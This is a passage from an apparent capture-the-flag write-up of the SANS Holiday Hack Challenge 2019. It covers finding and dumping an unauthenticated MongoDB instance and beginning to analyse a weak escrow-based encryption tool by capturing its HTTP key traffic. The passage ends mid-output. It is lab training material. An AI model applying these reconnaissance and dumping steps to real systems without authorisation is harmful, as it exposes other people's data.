Blind Injection &lt;span class="o"&gt;(&lt;/span&gt;Copyright &lt;span class="m"&gt;2014&lt;/span&gt; Yannick Méheut &amp;lt;useless &lt;span class="o"&gt;(&lt;/span&gt;at&lt;span class="o"&gt;)&lt;/span&gt; utouch &lt;span class="o"&gt;(&lt;/span&gt;dot&lt;span class="o"&gt;)&lt;/span&gt; fr&amp;gt;&lt;span class="o"&gt;)&lt;/span&gt;

&lt;span class="o"&gt;[&lt;/span&gt;&lt;span class="k"&gt;done&lt;/span&gt;&lt;span class="o"&gt;]&lt;/span&gt; retrieving data:
no result found
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We found six different paths to PNG files. We can download them from the
Student Portal. Weirdly enough, I couldn't download these files from my
browser, I had to download them using &lt;code&gt;wget&lt;/code&gt;. Anyway, here are the six
scraps of paper we were searching:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;a class="reference external" href="/images/sans-christmas-challenge-2019/0f5f510e.png"&gt;First scrap&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="/images/sans-christmas-challenge-2019/1cc7e121.png"&gt;Second scrap&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="/images/sans-christmas-challenge-2019/439f15e6.png"&gt;Third scrap&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="/images/sans-christmas-challenge-2019/667d6896.png"&gt;Fourth scrap&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="/images/sans-christmas-challenge-2019/adb798ca.png"&gt;Fifth scrap&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class="reference external" href="/images/sans-christmas-challenge-2019/ba417715.png"&gt;Sixth scrap&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We can try to reconstruct the full letter in GIMP, by moving the pieces:&lt;/p&gt;
&lt;img alt="letter.png" class="align-center" src="/images/sans-christmas-challenge-2019/letter.png" /&gt;
&lt;p&gt;Here's what it says:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;From the Desk of [...]&lt;/p&gt;
&lt;p&gt;Date: August 23, 20[...]&lt;/p&gt;
&lt;p&gt;Memo to Self:&lt;/p&gt;
&lt;p&gt;Finally! I've figured out how to destroy Christmas! Santa has a brand new
cutting edge sleigh guidance technology, called the Super Sled-o-matic.&lt;/p&gt;
&lt;p&gt;I've figured out a way to poison the data going into the system so that it
will divert Santa's sled on Christmas Eve!&lt;/p&gt;
&lt;p&gt;Santa will be unable to make the trip and the holiday season will be
destroyed! Santa's own technology will undermine him!&lt;/p&gt;
&lt;p&gt;That's what they deserve for not listening to my suggestions for supporting
other holiday characters!&lt;/p&gt;
&lt;p&gt;Bwahahahahaha!&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The upper-right corner is torn, so we can't say who it's from. But the
background drawing looks &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Human_tooth"&gt;familiar&lt;/a&gt;...&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-10"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id34"&gt;Objective 10:&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="holly-evergreen-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id35"&gt;Holly Evergreen's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;We must help Holly find the information she's looking for in MongoDB:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="go"&gt;Hello dear player!  Won&amp;#39;t you please come help me get my wish!&lt;/span&gt;
&lt;span class="go"&gt;I&amp;#39;m searching teacher&amp;#39;s database, but all I find are fish!&lt;/span&gt;
&lt;span class="go"&gt;Do all his boating trips effect some database dilution?&lt;/span&gt;
&lt;span class="go"&gt;It should not be this hard for me to find the quiz solution!&lt;/span&gt;

&lt;span class="go"&gt;Find the solution hidden in the MongoDB on this system.&lt;/span&gt;

&lt;span class="gp"&gt;elf@c6444428f1f4:~$&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's try to connect to MongoDB:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c6444428f1f4:~$&lt;/span&gt; mongo
&lt;span class="go"&gt;MongoDB shell version v3.6.3&lt;/span&gt;
&lt;span class="go"&gt;connecting to: mongodb://127.0.0.1:27017&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:54:26.073+0000 W NETWORK  [thread1] Failed to connect to 127.0.0.1:27017, in(checking socket for error after poll), reason: Connection refused&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:54:26.073+0000 E QUERY    [thread1] Error: couldn&amp;#39;t connect to server 127.0.0.1:27017, connection attempt failed :&lt;/span&gt;
&lt;span class="go"&gt;connect@src/mongo/shell/mongo.js:251:13&lt;/span&gt;
&lt;span class="go"&gt;@(connect):1:6&lt;/span&gt;
&lt;span class="go"&gt;exception: connect failed&lt;/span&gt;


&lt;span class="hll"&gt;&lt;span class="go"&gt;Hmm... what if Mongo isn&amp;#39;t running on the default port?&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can't seem to connect to MongoDB on the default port. As the hint suggests,
maybe it's running on a different port:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c6444428f1f4:~$&lt;/span&gt; netstat -tlpn
&lt;span class="go"&gt;(No info could be read for &amp;quot;-p&amp;quot;: geteuid()=1001 but you should be root.)&lt;/span&gt;
&lt;span class="go"&gt;Active Internet connections (only servers)&lt;/span&gt;
&lt;span class="go"&gt;Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;tcp        0      0 127.0.0.1:12121         0.0.0.0:*               LISTEN      -&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, there seems to be a program listening on port 12121. Let's try that:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c6444428f1f4:~$&lt;/span&gt; mongo --port &lt;span class="m"&gt;12121&lt;/span&gt;
&lt;span class="go"&gt;MongoDB shell version v3.6.3&lt;/span&gt;
&lt;span class="go"&gt;connecting to: mongodb://127.0.0.1:12121/&lt;/span&gt;
&lt;span class="go"&gt;MongoDB server version: 3.6.3&lt;/span&gt;
&lt;span class="go"&gt;Welcome to the MongoDB shell.&lt;/span&gt;
&lt;span class="go"&gt;For interactive help, type &amp;quot;help&amp;quot;.&lt;/span&gt;
&lt;span class="go"&gt;For more comprehensive documentation, see&lt;/span&gt;
&lt;span class="go"&gt;        http://docs.mongodb.org/&lt;/span&gt;
&lt;span class="go"&gt;Questions? Try the support group&lt;/span&gt;
&lt;span class="go"&gt;        http://groups.google.com/group/mongodb-user&lt;/span&gt;
&lt;span class="go"&gt;Server has startup warnings:&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:53:42.669+0000 I CONTROL  [initandlisten]&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:53:42.669+0000 I CONTROL  [initandlisten] ** WARNING: Access control is not enabled for the database.&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:53:42.669+0000 I CONTROL  [initandlisten] **          Read and write access to data and configuration is unrestricted.&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:53:42.669+0000 I CONTROL  [initandlisten]&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:53:42.669+0000 I CONTROL  [initandlisten]&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:53:42.669+0000 I CONTROL  [initandlisten] ** WARNING: /sys/kernel/mm/transparent_hugepage/enabled is &amp;#39;always&amp;#39;.&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:53:42.669+0000 I CONTROL  [initandlisten] **        We suggest setting it to &amp;#39;never&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:53:42.670+0000 I CONTROL  [initandlisten]&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;It's working! Let's list the available databases:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
&amp;gt; show dbs
admin   0.000GB
config  0.000GB
elfu    0.000GB
local   0.000GB
test    0.000GB
&lt;/pre&gt;
&lt;p&gt;Hmm, it might take a while to search in all these databases. They don't seem
to be particularly heavy. Maybe we can dump them all and search for the
solution using regular shell tools. We can dump the content of MongoDB using
&lt;code&gt;mongodump&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c6444428f1f4:~$&lt;/span&gt; mongodump --port &lt;span class="m"&gt;12121&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:59:43.690+0000    writing admin.system.version to&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:59:43.691+0000    done dumping admin.system.version (1 document)&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:59:43.691+0000    writing elfu.metadata to&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:59:43.691+0000    writing elfu.line to&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:59:43.691+0000    writing elfu.tincan to&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:59:43.692+0000    writing elfu.solution to&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:59:43.692+0000    done dumping elfu.line (1 document)&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:59:43.692+0000    writing elfu.bait to&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:59:43.692+0000    done dumping elfu.metadata (15 documents)&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:59:43.692+0000    writing elfu.tackle to&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:59:43.693+0000    done dumping elfu.bait (1 document)&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:59:43.693+0000    done dumping elfu.tackle (1 document)&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:59:43.693+0000    writing elfu.chum to&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:59:43.693+0000    writing test.redherring to&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:59:43.693+0000    done dumping elfu.tincan (1 document)&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:59:43.693+0000    done dumping elfu.chum (1 document)&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:59:43.740+0000    done dumping test.redherring (1 document)&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:59:43.740+0000    done dumping elfu.solution (1 document)&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now that everything is dumped, let's take a loot at the available files:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c6444428f1f4:~$&lt;/span&gt; ls -lR dump/
&lt;span class="go"&gt;dump/:&lt;/span&gt;
&lt;span class="go"&gt;total 12&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x 2 elf elf 4096 Dec 24 11:59 admin&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x 2 elf elf 4096 Dec 24 11:59 elfu&lt;/span&gt;
&lt;span class="go"&gt;drwxr-xr-x 2 elf elf 4096 Dec 24 11:59 test&lt;/span&gt;

&lt;span class="go"&gt;dump/admin:&lt;/span&gt;
&lt;span class="go"&gt;total 8&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 elf elf  59 Dec 24 11:59 system.version.bson&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 elf elf 134 Dec 24 11:59 system.version.metadata.json&lt;/span&gt;

&lt;span class="go"&gt;dump/elfu:&lt;/span&gt;
&lt;span class="go"&gt;total 56&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 elf elf   19 Dec 24 11:59 bait.bson&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 elf elf  123 Dec 24 11:59 bait.metadata.json&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 elf elf   19 Dec 24 11:59 chum.bson&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 elf elf  123 Dec 24 11:59 chum.metadata.json&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 elf elf   31 Dec 24 11:59 line.bson&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 elf elf  123 Dec 24 11:59 line.metadata.json&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 elf elf 3147 Dec 24 11:59 metadata.bson&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 elf elf  127 Dec 24 11:59 metadata.metadata.json&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;-rw-r--r-- 1 elf elf  116 Dec 24 11:59 solution.bson&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;-rw-r--r-- 1 elf elf  127 Dec 24 11:59 solution.metadata.json&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 elf elf   24 Dec 24 11:59 tackle.bson&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 elf elf  125 Dec 24 11:59 tackle.metadata.json&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 elf elf   23 Dec 24 11:59 tincan.bson&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 elf elf  125 Dec 24 11:59 tincan.metadata.json&lt;/span&gt;

&lt;span class="go"&gt;dump/test:&lt;/span&gt;
&lt;span class="go"&gt;total 8&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 elf elf  59 Dec 24 11:59 redherring.bson&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 elf elf 129 Dec 24 11:59 redherring.metadata.json&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The &lt;code&gt;dump/elfu/solution.bson&lt;/code&gt; file seems promising. Let's check it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c6444428f1f4:~$&lt;/span&gt; cat dump/elfu/solution.bson
&lt;span class="go"&gt;t_id fYou did good! Just run the command between the stars: ** db.loadServerScripts();displaySolution(); **&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, we're now supposed to run a command in MongoDB. Let's connect back to
it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@c6444428f1f4:~$&lt;/span&gt; mongo --port &lt;span class="m"&gt;12121&lt;/span&gt;
&lt;span class="go"&gt;MongoDB shell version v3.6.3&lt;/span&gt;
&lt;span class="go"&gt;connecting to: mongodb://127.0.0.1:12121/&lt;/span&gt;
&lt;span class="go"&gt;MongoDB server version: 3.6.3&lt;/span&gt;
&lt;span class="go"&gt;Server has startup warnings:&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:53:42.669+0000 I CONTROL  [initandlisten]&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:53:42.669+0000 I CONTROL  [initandlisten] ** WARNING: Access control is not enabled for the database.&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:53:42.669+0000 I CONTROL  [initandlisten] **          Read and write access to data and configuration is unrestricted.&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:53:42.669+0000 I CONTROL  [initandlisten]&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:53:42.669+0000 I CONTROL  [initandlisten]&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:53:42.669+0000 I CONTROL  [initandlisten] ** WARNING: /sys/kernel/mm/transparent_hugepage/enabled is &amp;#39;always&amp;#39;.&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:53:42.669+0000 I CONTROL  [initandlisten] **        We suggest setting it to &amp;#39;never&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;2019-12-24T11:53:42.670+0000 I CONTROL  [initandlisten]&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt; use elfu
&lt;/span&gt;&lt;span class="go"&gt;switched to db elfu&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="gp"&gt;&amp;gt;&lt;/span&gt; db.loadServerScripts&lt;span class="o"&gt;()&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;displaySolution&lt;span class="o"&gt;()&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/span&gt;
&lt;span class="go"&gt;       __/ __&lt;/span&gt;
&lt;span class="go"&gt;            /&lt;/span&gt;
&lt;span class="go"&gt;       /.&amp;#39;o&amp;#39;.&lt;/span&gt;
&lt;span class="go"&gt;        .o.&amp;#39;.&lt;/span&gt;
&lt;span class="go"&gt;       .&amp;#39;.&amp;#39;*&amp;#39;.&lt;/span&gt;
&lt;span class="go"&gt;      o&amp;#39;.*.&amp;#39;.*.&lt;/span&gt;
&lt;span class="go"&gt;     .&amp;#39;.o.&amp;#39;.&amp;#39;.*.&lt;/span&gt;
&lt;span class="go"&gt;    .o.&amp;#39;.o.&amp;#39;.o.&amp;#39;.&lt;/span&gt;
&lt;span class="go"&gt;       [_____]&lt;/span&gt;
&lt;span class="go"&gt;        ___/&lt;/span&gt;


&lt;span class="go"&gt;  Congratulations!!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="recover-cleartext-document"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id36"&gt;Recover Cleartext Document&lt;/a&gt;&lt;/h3&gt;
&lt;img alt="small_krampus.png" class="align-center" src="/images/sans-christmas-challenge-2019/small_krampus.png" /&gt;
&lt;p&gt;&lt;em&gt;Krampus says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Wow! We’ve uncovered quite a nasty plot to destroy the holiday season.&lt;/p&gt;
&lt;p&gt;We’ve gotta stop whomever is behind it!&lt;/p&gt;
&lt;p&gt;I managed to find &lt;a class="reference external" href="/docs/sans-christmas-challenge-2019/ElfUResearchLabsSuperSledOMaticQuickStartGuideV1.2.pdf.enc"&gt;this protected document&lt;/a&gt;
on one of the compromised machines in our environment.&lt;/p&gt;
&lt;p&gt;I think our attacker was in the process of exfiltrating it.&lt;/p&gt;
&lt;p&gt;I’m convinced that it is somehow associated with the plan to destroy the
holidays. Can you decrypt it?&lt;/p&gt;
&lt;p&gt;There are some smart people in the NetWars challenge room who may be able
to help us.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So, we have what seems to be an encrypted PDF that we need to decrypt. We're
given the &lt;a class="reference external" href="/docs/sans-christmas-challenge-2019/elfscrow.exe"&gt;elfscrow.exe&lt;/a&gt; tool, with
&lt;a class="reference external" href="/docs/sans-christmas-challenge-2019/elfscrow.pdb"&gt;debuging symbols&lt;/a&gt;. You know what
it means? It's reverse engineering time!&lt;/p&gt;
&lt;p&gt;Before static analysis, let's launch the &lt;code&gt;elfscrow.exe&lt;/code&gt; tool, to see how
it works:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS C:\Users\root\Documents\objectif_10&amp;gt; &lt;/span&gt;&lt;span class="p"&gt;.\&lt;/span&gt;&lt;span class="n"&gt;elfscrow&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;exe&lt;/span&gt;
&lt;span class="go"&gt;Welcome to ElfScrow V1.01, the only encryption trusted by Santa!&lt;/span&gt;


&lt;span class="go"&gt;* WARNING: You&amp;#39;re reading from stdin. That only partially works, use at your own risk!&lt;/span&gt;

&lt;span class="go"&gt;** Please pick --encrypt or --decrypt!&lt;/span&gt;

&lt;span class="go"&gt;Are you encrypting a file? Try --encrypt! For example:&lt;/span&gt;

&lt;span class="go"&gt;  C:\Users\root\Documents\objectif_10\elfscrow.exe --encrypt &amp;lt;infile&amp;gt; &amp;lt;outfile&amp;gt;&lt;/span&gt;

&lt;span class="go"&gt;You&amp;#39;ll be given a secret ID. Keep it safe! The only way to get the file&lt;/span&gt;
&lt;span class="go"&gt;back is to use that secret ID to decrypt it, like this:&lt;/span&gt;

&lt;span class="go"&gt;  C:\Users\root\Documents\objectif_10\elfscrow.exe --decrypt --id=&amp;lt;secret_id&amp;gt; &amp;lt;infile&amp;gt; &amp;lt;outfile&amp;gt;&lt;/span&gt;

&lt;span class="go"&gt;You can optionally pass --insecure to use unencrypted HTTP. But if you&lt;/span&gt;
&lt;span class="go"&gt;do that, you&amp;#39;ll be vulnerable to packet sniffers such as Wireshark that&lt;/span&gt;
&lt;span class="go"&gt;could potentially snoop on your traffic to figure out what&amp;#39;s going on!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, this tool seems to be able to encrypt or decrypt documents, with the key
sent to a &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Escrow"&gt;trusted third party&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Let's encrypt a document, and specify the &lt;code&gt;--insecure&lt;/code&gt; flag, so that we
can observe network communications:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS C:\Users\root\Documents\objectif_10&amp;gt; &lt;/span&gt;&lt;span class="p"&gt;.\&lt;/span&gt;&lt;span class="n"&gt;elfscrow&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;exe&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-insecure&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-encrypt&lt;/span&gt; &lt;span class="p"&gt;.\&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;txt&lt;/span&gt; &lt;span class="n"&gt;test&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;enc&lt;/span&gt;
&lt;span class="go"&gt;Welcome to ElfScrow V1.01, the only encryption trusted by Santa!&lt;/span&gt;

&lt;span class="go"&gt;*** WARNING: This traffic is using insecure HTTP and can be logged with tools such as Wireshark&lt;/span&gt;

&lt;span class="go"&gt;Our miniature elves are putting together random bits for your secret key!&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="go"&gt;Seed = 1578230480&lt;/span&gt;
&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;Generated an encryption key: a0ad8f3edde93d45 (length: 8)&lt;/span&gt;
&lt;/span&gt;
&lt;span class="go"&gt;Elfscrowing your key...&lt;/span&gt;

&lt;span class="go"&gt;Elfscrowing the key to: elfscrow.elfu.org/api/store&lt;/span&gt;

&lt;span class="hll"&gt;&lt;span class="go"&gt;Your secret id is ed662e52-a681-42c8-acf9-bee4caa4f5a8 - Santa Says, don&amp;#39;t share that key with anybody!&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;File successfully encrypted!&lt;/span&gt;

&lt;span class="go"&gt;    ++=====================++&lt;/span&gt;
&lt;span class="go"&gt;    ||                     ||&lt;/span&gt;
&lt;span class="go"&gt;    ||      ELF-SCROW      ||&lt;/span&gt;
&lt;span class="go"&gt;    ||                     ||&lt;/span&gt;
&lt;span class="go"&gt;    ||                     ||&lt;/span&gt;
&lt;span class="go"&gt;    ||                     ||&lt;/span&gt;
&lt;span class="go"&gt;    ||     O               ||&lt;/span&gt;
&lt;span class="go"&gt;    ||     |               ||&lt;/span&gt;
&lt;span class="go"&gt;    ||     |   (O)-        ||&lt;/span&gt;
&lt;span class="go"&gt;    ||     |               ||&lt;/span&gt;
&lt;span class="go"&gt;    ||     |               ||&lt;/span&gt;
&lt;span class="go"&gt;    ||                     ||&lt;/span&gt;
&lt;span class="go"&gt;    ||                     ||&lt;/span&gt;
&lt;span class="go"&gt;    ||                     ||&lt;/span&gt;
&lt;span class="go"&gt;    ||                     ||&lt;/span&gt;
&lt;span class="go"&gt;    ||                     ||&lt;/span&gt;
&lt;span class="go"&gt;    ++=====================++&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's take a look at the HTTP communication:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/api/store&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;ElfScrow V1.01 (SantaBrowse Compatible)&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;elfscrow.elfu.org&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;16&lt;/span&gt;
&lt;span class="na"&gt;Cache-Control&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;no-cache&lt;/span&gt;

a0ad8f3edde93d45
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.14.2&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Sun, 05 Jan 2020 14:49:04 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html;charset=utf-8&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;36&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;keep-alive&lt;/span&gt;
&lt;span class="na"&gt;X-Xss-Protection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1; mode=block&lt;/span&gt;
&lt;span class="na"&gt;X-Content-Type-Options&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nosniff&lt;/span&gt;
&lt;span class="na"&gt;X-Frame-Options&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;SAMEORIGIN&lt;/span&gt;

ed662e52-a681-42c8-acf9-bee4caa4f5a8
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, it seems that the tool generates an encryption key, using a seed (that
suspiciously looks like a &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Unix_time"&gt;Unix timestamp&lt;/a&gt;),
encrypts the document, and then sends the key to the elfscrow.elfu.org website,
which then gives us an id that will be used for decryption.&lt;/p&gt;
&lt;p&gt;Let's see the decryption process:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;PS C:\Users\root\Documents\objectif_10&amp;gt; &lt;/span&gt;&lt;span class="p"&gt;.\&lt;/span&gt;&lt;span class="n"&gt;elfscrow&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;exe&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-id&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="n"&gt;ed662e52-a681&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;42c8-acf9-bee4caa4f5a8&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-insecure&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-decrypt&lt;/span&gt; &lt;span class="n"&gt;test&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;enc&lt;/span&gt; &lt;span class="n"&gt;test&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;dec&lt;/span&gt;
&lt;span class="go"&gt;Welcome to ElfScrow V1.01, the only encryption trusted by Santa!&lt;/span&gt;

&lt;span class="go"&gt;*** WARNING: This traffic is using insecure HTTP and can be logged with tools such as Wireshark&lt;/span&gt;

&lt;span class="go"&gt;Let&amp;#39;s see if we can find your key...&lt;/span&gt;

